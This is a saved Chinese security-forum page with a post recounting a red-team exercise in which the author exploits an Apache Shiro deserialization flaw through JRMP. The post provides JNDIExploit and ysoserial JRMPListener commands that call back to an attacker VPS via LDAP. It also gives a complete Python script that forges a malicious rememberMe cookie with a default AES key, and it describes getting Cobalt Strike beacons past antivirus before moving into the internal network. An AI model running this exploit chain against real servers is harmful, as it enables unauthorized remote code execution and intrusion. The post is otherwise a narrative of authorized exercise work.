                <strong><a title="复制本帖链接" id="postnum202821" href="javascript:;" onclick="setCopy('http://forum.ywhack.com/viewthread.php?tid=200939', '帖子地址已经复制到剪贴板')"><em>1</em><sup>#</sup></a>
<em class="rpostno" title="跳转到指定楼层">跳转到 <input id="rpostnovalue" size="3" type="text" class="txtarea" onkeydown="if(event.keyCode==13) {$('rpostnobtn').click();return false;}"><span id="rpostnobtn" onclick="window.location='redirect.php?ptid=200939&amp;ordertype=0&amp;postno='+$('rpostnovalue').value">»</span></em>
<a href="https://forum.ywhack.com/viewthread.php?tid=200939&amp;extra=page%3D7&amp;ordertype=1" class="left">倒序看帖</a>
</strong>
                <div class="posterinfo">
                    <div class="pagecontrol">
                                                <!--<a href="viewthread.php?action=printable&amp;tid=200939" target="_blank" class="print left">打印</a>-->
                                                <div class="msgfsize right">
                            <label>字体大小: </label><small onclick="$('postlist').className='mainbox viewthread'" title="正常">t</small><big onclick="$('postlist').className='mainbox viewthread t_bigfont'" title="放大">T</big>
                        </div>
                                                                    </div>
                    <div class="authorinfo">
                                                <img class="authicon" id="authicon202821" src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/online_member.gif" onclick="showauthor(this, 'userinfo202821');">
                                                                        <em id="authorposton202821">发表于 2022-7-7 10:21:53 来自::Edge.Forum*</em>
                                                | <a href="https://forum.ywhack.com/viewthread.php?tid=200939&amp;page=1&amp;authorid=149" rel="nofollow">只看该作者</a>
                                                | <font color="#444444"><font color="#FF0000">88</font> 次浏览</font>
                        | <a href="javascript:;" onclick="javascript:$('fastpostmessage').value=$('fastpostmessage').value+'@dreamland ';scroll(0, $('footer').offsetTop);" rel="nofollow" style="color:red">@该作者</a>
<div class="fxrk" style="display:inline">一键分享：
<!--<a target="_self" href="javascript:void(0);" onclick="postToWb();return false;" style="height: 16px; font-size: 12px; line-height: 16px;" title="转播到腾讯微博"><img src="images/share/ico_qqweibo.png">腾讯微博</a>-->
<a title="转播到新浪微博" href="javascript:(function(){window.open('http://v.t.sina.com.cn/share/share.php?title='+encodeURIComponent(document.title)+'&amp;url='+encodeURIComponent(location.href)+'&amp;source=bookmark','_blank','width=450,height=400');})()"><img src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/ico_sina.gif">新浪微博</a></div>
                                            </div>
                </div>
            </div>
            <div class="defaultpost">
                                <div id="ad_thread2_0"></div>
                                                <div id="ad_thread3_0"></div>
                                <div id="ad_thread4_0"></div>
                <div class="postmessage firstpost">
                                                                                <div id="threadtitle">
                                                <h1><a href="https://forum.ywhack.com/forumdisplay.php?fid=56&amp;filter=type&amp;typeid=33">[<font color="red">【原创】</font>]</a> 某演练入口点shiro JRMP利用</h1>
                                            </div>
                                                                        
                                                                        
                                                        <style type="text/css">.t_msgfont_html {line-height: 1.6em;}</style>
                    <div class="t_msgfontfix">
                    <link rel="stylesheet" href="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/md.css">                                            <table cellspacing="0" cellpadding="0">
                            <tbody><tr>                                    <td class="t_msgfont" id="postmessage_202821"><div class="markdown-body"><p>在某年某月某天某行业HVV中，又开始新的HVV的我摩拳擦掌，势要拿下一个靶标！</p>
<hr><p>等了好久，拿到目标和攻击队信息，当我打开主办方发来的目标xlsx，看到仅有的几个攻击目标，再看看单位的名称，我隐隐觉得事情可能不太妙，我方收到针对，请求支援！  <br></p>
<p>话不多说，先开始第一波信息收集，收集一天过去了，两位大佬加上我这个小菜鸡目前一个口子都没有。。。群里气氛开始凝重了起来，开始的踌躇满志现在也消失殆尽，给我个口子啊，一个也行啊！！!<br>
第二天下午，队友发来一个shiro的站，说反弹不了shell。<br></p>
<p><img src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/22070710021a4e80f96f2bf472.png" alt="file" width="680" height="86"><br></p>
<p>我先拿着shiro工具就是一把梭，发现有默认key，没有链。。<br></p>
<p>常用的shiro工具：  </p>
<p><a href="https://github.com/feihong-cs/ShiroExploit-Deprecated">https://github.com/feihong-cs/ShiroExploit-Deprecated</a> <br><a href="https://github.com/SummerSec/ShiroAttack2">https://github.com/SummerSec/ShiroAttack2</a> <br><a href="https://github.com/j1anFen/shiro_attack">https://github.com/j1anFen/shiro_attack</a> <br></p>
<p>(当时忘了截图了，偷队友一张图，嘻嘻)<br></p>
<p><img src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/2207071002f637191fc4c639a6.png" alt="file" width="680" height="472"></p>
<p><br>
这个时候，队友补充了下是shiro无链利用。拿着qax的工具先试试，发现也是不行：<br></p>
<p>链接：<a href="https://github.com/dr0op/shiro-550-with-NoCC">https://github.com/dr0op/shiro-550-with-NoCC</a><br></p>
<p>完了，难道要芭比Q了吗？<br></p>
<p>看来工具一把梭不太行了，只能另寻方法。使用shiro_tools发现存在的是jrmp利用。<br></p>
<p>工具链接：<a href="https://github.com/wyzxxz/shiro_rce_tool">https://github.com/wyzxxz/shiro_rce_tool</a><br></p>
<p><img src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/220707100602216285665a07ba.png" alt="file" width="680" height="507"></p>
<p><br>
这个时候我仔细看了下队友前面执行的命令，发现是用linux的命令进行反弹，我在想是不是windows的操作系统呢？利用windows目录大小写不敏感的特性探测了下，发现确实是个windows，不是没有洞那就好说了。<br>
JRMP利用可参考这篇文章：<a href="https://sumsec.me/2021/shiro-JRMP-gadget.html">https://sumsec.me/2021/shiro-JRMP-gadget.html</a></p>
<p><br>
怎么用已经写的比较明白了，工具包也给了，嘿嘿。<br></p>
<p>简单再说下使用：<br></p>
<p>vps先起来个JNDIExploit。<br></p>
<pre><code class="hljs language-css">java -jar JNDIExploit-<span class="hljs-number">1.0</span>-SNAPSHOT<span class="hljs-selector-class">.jar</span> -<span class="hljs-selector-tag">i</span> vpsip</code></pre>
<p>把自己要执行的命令做个编码，部分命令中间有空格执行会有问题滴。<br></p>
<pre><code class="hljs language-bash">java -<span class="hljs-built_in">cp</span> ysoserial-0.0.6-SNAPSHOT-1.8.3.jar ysoserial.exploit.JRMPListener 8088 CommonsBeanutils2 <span class="hljs-string">"ldap://ip:port/Basic/Command/Base64/xxx</span></code></pre>
<p>然后再使用脚本生成对应的cookie，这里还得注意把key改了，队友后面问我怎么它没执行命令成功，我掐指一算可能就是key没改。<br></p>
<pre><code class="hljs language-python"><span class="hljs-keyword">import</span> sys <span class="hljs-comment"># http11InputBuffer</span>
<span class="hljs-keyword">import</span> uuid
<span class="hljs-keyword">import</span> base64
<span class="hljs-keyword">import</span> subprocess
<span class="hljs-keyword">from</span> Crypto.Cipher <span class="hljs-keyword">import</span> AES

<span class="hljs-keyword">def</span> <span class="hljs-title function_">encode_rememberme</span>(<span class="hljs-params">command</span>):

    popen = subprocess.Popen([<span class="hljs-string">'java'</span>, <span class="hljs-string">'-jar'</span>, <span class="hljs-string">'ysoserial-0.0.6-SNAPSHOT-1.8.3.jar'</span>, <span class="hljs-string">'JRMPClient'</span>, command], stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = <span class="hljs-keyword">lambda</span> s: s + ((BS - <span class="hljs-built_in">len</span>(s) % BS) * <span class="hljs-built_in">chr</span>(BS - <span class="hljs-built_in">len</span>(s) % BS)).encode()
    key = base64.b64decode(<span class="hljs-string">"4AvVhmFLUs0KTA3Kprsdag=="</span>)   <span class="hljs-comment">#记得改key</span>
    iv = uuid.uuid4().<span class="hljs-built_in">bytes</span>
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    <span class="hljs-keyword">return</span> base64_ciphertext

<span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">'__main__'</span>:
    payload = encode_rememberme(<span class="hljs-string">"ip:8088"</span>)
    <span class="hljs-built_in">print</span>(<span class="hljs-string">"rememberMe={0}"</span>.<span class="hljs-built_in">format</span>(payload.decode()))</code></pre>
<p>然后使用burp发包，burp发包确实会像文章说的那样存在写问题，可能过一会就得重新生成cookie了。<br>
成功执行命令。<br></p>
<p><img src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/2207071018f063e34f3c98413f.png" alt="file" width="680" height="58"><br>
探测下杀软吧，又是360。<br></p>
<p><img src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/2207071018c49a20ecca4e3069.png" alt="file" width="680" height="327"></p>
<p><br></p>
<hr><p>这里上线cs又有好多波折，队友拿免杀马给我让我上cs，试了好久，怎么都上线不了，我以为是命令执行还存在点问题。然后开始转向写
webshell，写着写着想到会不会是马有问题呢？于是启动我尘封已久的cs生成了下powershell 
cmd上线命令想先试试，结果我的cs直接就上线了。。。后面猜测和搜了下相关文章可能是由于java起的命令，360没有做拦截。然后也和队友说了下马
是不是有问题，队友换了个马，也成功上了他的cs啦！随后又开启一段折磨的内网之旅~最后也是内网成功打到单个单位得分上限了。
后面各位师傅在打shiro的时候也可以多换几个工具试试，说不定就有一个能探测到呢？<br></p>
<p>HVV第一轮打点的时候肯定是比如把收集到的资产用ehole等过一遍重点资产（没day的情况下），但是一轮没有洞之后就得对收集到的资产进行第
二轮打点探测了。二轮的时候推荐就burp shiro的插件一直挂着，有些shiro可能在某个功能点上，可以过一会就看下，说不定就有惊喜呢是吧。<br></p>
<p>最后在两位大佬的带领下，也是拿到了前三。两位大佬演练后对我端茶送水的能力十分认可，能得到大佬的认可我可太开心啦~希望下次大佬们还ddw。嘿嘿。<br></p>
<p>参考链接：<a href="https://sumsec.me/2021/shiro-JRMP-gadget.html">https://sumsec.me/2021/shiro-JRMP-gadget.html</a><br></p></div>
                                                                    </td>
                            </tr>
                        </tbody></table>
                                                                        
                                                                        
                    </div>
                                                            <dl class="newrate">
                        <dt>
                                                        <strong><a href="https://forum.ywhack.com/misc.php?action=viewratings&amp;tid=200939&amp;pid=202821" onclick="showWindow('viewratings', this.href);return false;" title="本帖最近评分记录">1</a></strong>
                            <p>评分人数</p>
                                                    </dt>
                        <dd>
                            <ul class="s_clear">
                                <div id="post_rate_202821"></div>
                                                                <ul class="s_clear ratelist">
                                                                        <li id="rate_202821_11" class="ratelistavatar">
                                        <a href="https://forum.ywhack.com/space-uid-11.html" target="_blank"><img src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/11_avatar_small.jpg" onerror="this.onerror=null;this.src='https://forum.ywhack.com/ucedge_server/images/noavatar_small.gif'"></a><a href="https://forum.ywhack.com/space-uid-11.html" target="_blank">r1ng:</a>                                                                                                                         <em>金币 + 3 </em>
                                                                        
                                                                        
                <em>贡献 + 1 </em>
                                                                        
                                                                        
                <em>棱星 + 1 </em>
                                                                                                                    </li>
                                                                    </ul>
                                                            </ul>
                        </dd>
                    </dl>
                                                                        
                                                                   <!-- <div class="points">
                    <span class="ding" title="顶" onclick="showDialog($('haotiewin').innerHTML, 'info', '顶帖')"><b>1</b><em>顶</em></span>
                    <span class="cai" title="踩" onclick="showDialog($('lajitiewin').innerHTML, 'info', '踩帖')"><b>0</b><em>踩</em></span>
</div>-->
                    <div class="useraction nrate">
                        <a href="javascript:;" onclick="showDialog($('favoritewin').innerHTML, 'info', '收藏/关注')">收藏</a>
                        <a href="javascript:;" id="share" onclick="showDialog($('sharewin').innerHTML, 'info', '分享')">分享</a>
                                                <div id="ajax_recommendlink">
                            <div id="recommendv" onclick="switchrecommendv()" title="主题评价指数" style="display: none">0</div>
                            <ul id="recommendav" onclick="switchrecommendv()" title="主题评价指数" class="recommend_act s_clear">
                                <li id="recommendv_add" title="顶的人数">0</li>
                                <li id="recommendv_subtract" title="踩的人数">0</li>
                            </ul>
                            <ul class="recommend_act s_clear">
                                <li><a id="recommend_add" href="https://forum.ywhack.com/misc.php?action=recommend&amp;do=add&amp;tid=200939" onclick="ajaxmenu(this, 3000, 1, 0, '43', 'recommendupdate(1)');;doane(event);">顶</a></li>
                                <li><a id="recommend_subtract" href="https://forum.ywhack.com/misc.php?action=recommend&amp;do=subtract&amp;tid=200939" onclick="ajaxmenu(this, 3000, 1, 0, '43', 'recommendupdate(-1)');;doane(event);">踩</a></li>
                            </ul>
                        </div>
                                                                    </div>
                                    </div>
            </div>
        </td>
    </tr>
    <tr>
        <td class="postcontent postbottom">

                        <div class="signatures" style="max-height:100px;maxHeightIE:100px;"><span style="color:#993333;">温馨提示：您还没设置签名哦! —赶快设置签名让更多人看到吧！</span></div>
                                    <div id="ad_thread1_0"></div>
                    </td>
    </tr>
    <tr>
        <td class="postauthor"></td>
        <td class="postcontent">
            <div class="postactions">
                                <div class="postact s_clear">
                    <em>
<a class="fastreply" href="https://forum.ywhack.com/post.php?action=reply&amp;fid=56&amp;tid=200939&amp;reppost=202821&amp;extra=page%3D7&amp;page=1" onclick="showWindow('reply', this.href);return false;">回复</a>
<a class="repquote" href="https://forum.ywhack.com/post.php?action=reply&amp;fid=56&amp;tid=200939&amp;repquote=202821&amp;extra=page%3D7&amp;page=1" onclick="showWindow('reply', this.href);return false;">引用</a>
</em>
                    <p>
                                                                        <a href="https://forum.ywhack.com/misc.php?action=rate&amp;tid=200939&amp;pid=202821" onclick="showWindow('rate', this.href);return false;">评分</a>
                                                                                                <a href="https://forum.ywhack.com/misc.php?action=report&amp;fid=56&amp;tid=200939&amp;pid=202821" onclick="showWindow('report', this.href);doane(event);">报告</a>
                                                                        <a href="https://forum.ywhack.com/magic.php?action=getmagic&amp;fid=56&amp;pid=202821" id="usermagicopt202821" class="dropmenu" onmouseover="SMAM=setTimeout(function() {ajaxmenu($('usermagicopt202821'), 1000, 1, 2);doane(event);}, 500)" onmouseout="clearTimeout(SMAM)" onclick="if($(this.id + '_menu') &amp;&amp; $(this.id + '_menu').style.display == '') {hideMenu(this.id + '_menu')} else {ajaxmenu(this, 1000, 1, 2);}doane(event);">使用道具</a>
                                                    
                                            </p>
                </div>
            </div>
        </td>
    </tr>
    <tr class="threadad">
        <td class="postauthor"></td>
        <td class="adcontent">
                    </td>
    </tr>
    </tbody></table>
 <script type="text/javascript" reload="1">
    function ResizeImages()
    {
       var myimg,oldwidth,oldheight;
       var maxwidth=680;
       var maxheight=800
       var imgs = document.getElementById("postmessage_202821").getElementsByTagName('img');   //如果你定义的id不是article，请修改此处
     
     
       for(i=0;i<imgs.length;i++){
         myimg = imgs[i];
         myimg.onclick = function(){
            zoom(this, this.src);
         }
         
     
     
         if(myimg.width > myimg.height)
         {
             if(myimg.width > maxwidth)
             {
                oldwidth = myimg.width;
                myimg.height = myimg.height * (maxwidth/oldwidth);
                myimg.width = maxwidth;
             }
         }else{
             if(myimg.height > maxheight)
             {
                oldheight = myimg.height;
                myimg.width = myimg.width * (maxheight/oldheight);
                myimg.height = maxheight;
             }
         }
       }
    
       setTimeout("ResizeImages()", 100);
    }
    //缩放图片到合适大小
    ResizeImages();
</script></div></div>

<div id="postlistreply" class="mainbox viewthread"><div id="post_new" class="viewthread_table" style="display: none"></div></div>

<form method="post" name="modactions" id="modactions">
<input type="hidden" name="formhash" value="6bff928a">
<input type="hidden" name="optgroup">
<input type="hidden" name="operation">
<input type="hidden" name="listextra" value="page%3D7">
</form>


<div class="forumcontrol s_clear">
<table class="narrow" cellspacing="0" cellpadding="0">
<tbody><tr>
<td class="modaction">
</td>
<td>
<span class="pageback" id="visitedforums" onmouseover="$('visitedforums').id = 'visitedforumstmp';this.id = 'visitedforums';showMenu({'ctrlid':this.id})"><a href="https://forum.ywhack.com/forum-56-7.html">返回列表</a></span>
</td>
</tr>
</tbody></table>
</div>


<script type="text/javascript">
var postminchars = parseInt('10');
var postmaxchars = parseInt('10000000000');
var disablepostctrl = parseInt('0');
</script>

<div id="f_post" class="mainbox viewthread">
<form method="post" id="fastpostform" action="post.php?action=reply&amp;fid=56&amp;tid=200939&amp;extra=page%3D7&amp;replysubmit=yes&amp;infloat=yes&amp;handlekey=fastpost" onsubmit="">
<table cellspacing="0" cellpadding="0">
<tbody><tr>
<td class="postauthor">
<div class="avatar"><img src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/noavatar_middle.gif" onerror="this.onerror=null;this.src='https://forum.ywhack.com/ucedge_server/images/noavatar_middle.gif'"></div></td>
<td class="postcontent">
<input type="hidden" name="formhash" value="6bff928a">
<input type="hidden" name="subject" value="">
<input type="hidden" name="usesig" value="0">

<span id="fastpostreturn"></span>
<div class="editor_tb">
<span class="right">
<a href="https://forum.ywhack.com/post.php?action=reply&amp;fid=56&amp;tid=200939" onclick="return switchAdvanceMode(this.href)">高级模式</a>
<span class="pipe">|</span>
<span id="newspecialtmp" onmouseover="$('newspecial').id = 'newspecialtmp';this.id = 'newspecial';showMenu({'ctrlid':this.id})"><a href="https://forum.ywhack.com/post.php?action=newthread&amp;fid=56" onclick="showWindow('newthread', this.href);return false;">发新话题</a></span>
</span><link rel="stylesheet" type="text/css" href="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/style_13_seditor.css">
<div>
<a href="javascript:;" title="粗体" class="tb_bold" onclick="seditor_insertunit('fastpost', '[b]', '[/b]')">B</a>
<a href="javascript:;" title="颜色" class="tb_color" id="fastpostforecolor" onclick="showColorBox(this.id, 2, 'fastpost')">Color</a>
<a href="javascript:;" title="图片" class="tb_img" onclick="seditor_insertunit('fastpost', '[img]', '[/img]')">Image</a>
<a href="javascript:;" title="插入链接" class="tb_link" onclick="seditor_insertunit('fastpost', '[url]', '[/url]')">Link</a>
<a href="javascript:;" title="引用" class="tb_quote" onclick="seditor_insertunit('fastpost', '[quote]', '[/quote]')">Quote</a>
<a href="javascript:;" title="代码" class="tb_code" onclick="seditor_insertunit('fastpost', '[code]', '[/code]')">Code</a>
<a href="javascript:;" class="tb_smilies" id="fastpostsmilies" onclick="showMenu({'ctrlid':this.id,'evt':'click','layer':2});return false">Smilies</a>
<script src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/smilies_var.js" type="text/javascript" reload="1"></script>
<script type="text/javascript" reload="1">smilies_show('fastpostsmiliesdiv', 8, 'fastpost');</script>
</div></div>
<textarea rows="5" cols="80" name="message" id="fastpostmessage" onkeydown="seditor_ctlent(event, 'fastpostvalidate($(\'fastpostform\'))');" tabindex="4" class="txtarea"></textarea>
<p><button type="submit" name="replysubmit" id="fastpostsubmit" value="replysubmit" tabindex="5">发表回复</button>
<input id="fastpostrefresh" type="checkbox"> <label for="fastpostrefresh">回帖后跳转到最后一页</label>&nbsp;&nbsp;<font color="#ff0000">Ctrl + Enter 快速发布</font></p><script type="text/javascript">if(getcookie('discuz_fastpostrefresh') == 1) {$('fastpostrefresh').checked=true;}</script>
<p></p>
<p></p><div style="width:590px; line-height:18px; background:#fff; border:#000 1px dotted; font-size:12px;padding:5px; clear:both; margin-top:5px">请珍惜您的ID,严禁回帖灌水！否则将视为违反社区规则！</div><p></p>
</td>
</tr>
</tbody></table>
</form>
</div>

<ul class="popupmenu_popup" id="visitedforums_menu" style="display: none">
<li><a href="https://forum.ywhack.com/forumdisplay.php?fid=61&amp;sid=Um69JQ"># 审核专版(Review Section)</a></li><li><a href="https://forum.ywhack.com/forumdisplay.php?fid=53&amp;sid=Um69JQ"># 先知社区(XZ.Aliyun)</a></li><li><a href="https://forum.ywhack.com/forumdisplay.php?fid=59&amp;sid=Um69JQ"># 攻防日报(Daily safety)</a></li><li><a href="https://forum.ywhack.com/forumdisplay.php?fid=35&amp;sid=Um69JQ"># 溢出代码(ExpLoit &amp; Poc)</a></li><li><a href="https://forum.ywhack.com/forumdisplay.php?fid=28&amp;sid=Um69JQ"># 综合交流(Security Talk)</a></li><li><a href="https://forum.ywhack.com/forumdisplay.php?fid=29&amp;sid=Um69JQ"># 安全工具(Hacker Tools)</a></li><li><a href="https://forum.ywhack.com/forumdisplay.php?fid=5&amp;sid=Um69JQ"># 站务处理(Station Board)</a></li><li><a href="https://forum.ywhack.com/forumdisplay.php?fid=17&amp;sid=Um69JQ"># 安全资讯(Security News)</a></li></ul>

<div id="favoritewin" style="display: none">
<h5>
<a href="javascript:;" onclick="ajaxget('my.php?item=favorites&amp;tid=200939', 'favorite_msg');return false;" class="lightlink">[收藏此主题]</a>&nbsp;
<a href="javascript:;" onclick="ajaxget('my.php?item=attention&amp;action=add&amp;tid=200939', 'favorite_msg');return false;" class="lightlink">[关注此主题的新回复]</a>
</h5>
<span id="favorite_msg"></span>
</div>

<div id="sharewin" style="display: none">
<h5>
<a href="javascript:;" onclick="setCopy('某演练入口点shiro JRMP利用\nhttp://forum.ywhack.com/viewthread.php?tid=200939', '帖子地址已经复制到剪贴板<br />您可以用快捷键 Ctrl + V 粘贴到 QQ、MSN 里。')" class="lightlink">[通过 QQ、MSN 分享给朋友]</a><br><br>
<a href="javascript:;" class="lightlink" onclick="hideWindow('confirm');showWindow('sendpm', 'pm.php?action=new&amp;operation=share&amp;tid=200939');">[通过站内短消息分享给朋友]</a>
</h5>
</div>

<script language="javascript">
var codes=document.getElementsByTagName("code");
for(var i=0;i<codes.length;i++){
codes[i].innerHTML=codes[i].innerHTML.replace(/<br>/g, "");
}
</script>
</div><ul class="popupmenu_popup headermenu_popup" id="CmmKLM_menu" style="display: none"><li><a href="https://forum.ywhack.com/bountytips.php" hidefocus="true">工具首页</a></li><li><a href="https://forum.ywhack.com/bountytips.php?tools" hidefocus="true" target="_blank">在线工具</a></li><li><a href="https://forum.ywhack.com/coding.php" hidefocus="true">编码转换</a></li><li><a href="https://forum.ywhack.com/shell.php" hidefocus="true" target="_blank">反弹shell</a></li><li><a href="https://forum.ywhack.com/bountytips.php?process" hidefocus="true" target="_blank" style="color: red">进程识别</a></li><li><a href="https://forum.ywhack.com/url.php" hidefocus="true" target="_blank">资产分拣</a></li><li><a href="https://forum.ywhack.com/escape.php" hidefocus="true">Win转义</a></li><li><a href="https://forum.ywhack.com/wordlists.php" hidefocus="true" target="_blank">字典查看</a></li><li><a href="https://forum.ywhack.com/password.php" hidefocus="true">默认密码</a></li><li><a href="https://forum.ywhack.com/bountytips.php?download" hidefocus="true" target="_blank">文件下载</a></li></ul><div id="ad_footerbanner1"></div><div id="ad_footerbanner2"></div><div id="ad_footerbanner3"></div>

<div id="footer">
<div class="wrap s_clear">
<div id="footlink">
<p>
<!--<strong><a href="https://forum.ywhack.com/" target="_blank">Edge Security Team</a></strong>-->
<a href="http://www.miibeian.gov.cn/" target="_blank">渝ICP备15013288号</a><span class="pipe">|</span><a href="https://forum.ywhack.com/stats.php">论坛统计</a><span class="pipe">| <script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?6c97fbf63dd98317dba802ddddaad905";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>
</span></p>
<p class="smalltext">
GMT+8, 2023-4-23 16:07.
</p>
</div>
<div id="rightinfo">
<p>Powered by <strong><a href="http://www.ywhack.com/" target="_blank">Discuz!</a></strong> <em>1.0</em></p>

</div></div>
</div>
  

</body></html>